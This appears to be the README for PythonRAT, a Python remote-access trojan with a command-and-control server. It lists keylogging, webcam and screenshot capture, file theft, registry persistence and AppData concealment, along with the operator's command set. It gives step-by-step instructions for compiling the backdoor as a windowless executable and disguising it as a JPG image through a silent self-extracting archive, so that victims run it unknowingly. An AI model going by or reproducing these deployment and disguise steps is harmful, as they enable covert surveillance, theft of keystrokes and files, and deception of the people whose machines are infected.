PythonRAT is a Command and Control (C2) server which can control multiple machines running the Remote Administration Trojan (RAT) forming a botnet cluster which was written in Python3.
PythonRAT was developed for educational purposes and continues to be developed as such!
Integrated keylogger written as a class
Check privilege level (Administrator/User)
Spawn other programs
Download files from target
Download files from specified URL
Upload files to target
C2 allows control of multiple target sessions
Issue a sendall command to every active session
Persistence by creating a registry entry (Windows)
Conceals infection by writing files in AppData (Windows)
Screenshot of the target's screen which is sent to server
Remote shutdown of the backdoor (executable is NOT safely removed)
targets --> Prints Active Sessions session *session num* --> Will Connect To Session (background to return) clear --> Clear Terminal Screen exit --> Quit ALL Active Sessions and Closes C2 Server!! kill *session num* --> Issue 'quit' To Specified Target Session sendall *command* --> Sends The *command* To ALL Active Sessions (sendall notepad)
quit --> Quit Session With The Target clear --> Clear The Screen background / bg --> Send Session With Target To Background cd *Directory name* --> Changes Directory On Target System upload *file name* --> Upload File To The Target Machine From Working Dir download *file name* --> Download File From Target Machine get *url* --> Download File From Specified URL to Target ./ keylog_start --> Start The Keylogger keylog_dump --> Print Keystrokes That The Target From taskmanager.txt keylog_stop --> Stop And Self Destruct Keylogger File screenshot --> Takes screenshot and sends to server ./images/screenshots/ webcam --> Takes image with webcam and sends to ./images/webcam/ start *programName* --> Spawn Program Using backdoor e.g. 'start notepad' remove_backdoor --> Removes backdoor from target!!! ===Windows Only=== persistence *RegName* *filename* --> Create Persistence In Registry copies backdoor to ~/AppData/Roaming/filename example: persistence Backdoor windows32.exe check --> Check If Has Administrator Privileges
The C2 server has no external dependencies as of v0.9.2-alpha.
The backdoor relies on the following as of v0.10.1-alpha:
pip install mss \ pynput \ requests
The below mentioned steps are for compiling the backdoor for deployment. For those wishing to test the C2 server and backdoor interaction see issue 1.
Python 2.7.14 Releases: https://www.python.org/downloads/release/python-2714/
sudo su dpkg --add-architecture i386 apt update apt install wine32 wget https://www.python.org/ftp/python/2.7.14/python-2.7.14.msi sudo wine msiexec -i ~/python-2.7.14.msi #x86 arch
cd /root/.wine/drive_c/Python27 wine python.exe -m pip install pyinstaller \ requests \ mss \ pynput
$ pyinstaller --onefile --noconsole backdoor.py
wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole ~/backdoor.py
alternatively if an icon has already been created,
wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --icon ~/malware_128x128.ico ~/backdoor.py
This will produce ./dist/backdoor.exe
The executable backdoor.exe will be made to look like an image (jpg) file. By default, Windows does not show file extensions (e.g. backdoor.exe will show in Windows Explorer as backdoor). Hence, we will create an SFX archive name wallpaper.jpg.exe which Windows Explorer will show as wallpaper.jpg.
This will involve having an image which we will also create an icon version of .ico to assign the SFX archive. Making the executable appear to be an image.
Of course, this same method could be applied to audio, document or video file using an appropriate icon.
SFX archive is not the only method of obfuscating the executable. We can when compiling using Pyinstaller add the argument --add-data "/root/wallpaper.jpg;." with --icon ~/wallpaper.ico.
wine /root/.wine/drive_c/Python27/Scripts/pyinstaller.exe --onefile --noconsole --add-data "/root/wallpaper.jpg;." --icon ~/malware_128x128.ico ~/backdoor.py mv ./dist/_backdoor.exe_ ./dist/_wallpaper.jpg.exe_
WinRAR > Add To Archive (image.jpg and backdoor.exe)
Rename archive to: image.jpg.exe
-Add to SFX Archive (Y) and Advanced>
**Setup>Run after extraction** California-HD-Background.jpg backdoor.exe **Modes** Unpack to temporary folder Silent mode Hide all **Update** Update mode> Extract and update files Overwrite mode> Overwrite all files **Text and icon** Load SFX icon from the file (image ICO)
This will produce an SFX archive which looks like an image
While inspecting the file will reveal it is an executable the file extension .exe is concealed. Furthermore, if viewed from the Desktop the file cannot be differentiated from a 'real' image.
Once opened the SFX archive will open the image file inside the archive and the malware will execute after.
Due to --noconsole argument in Pyinstaller, no window will be rendered.
The backdoor.exe process can be seen in Task Manager and ended there if necessary.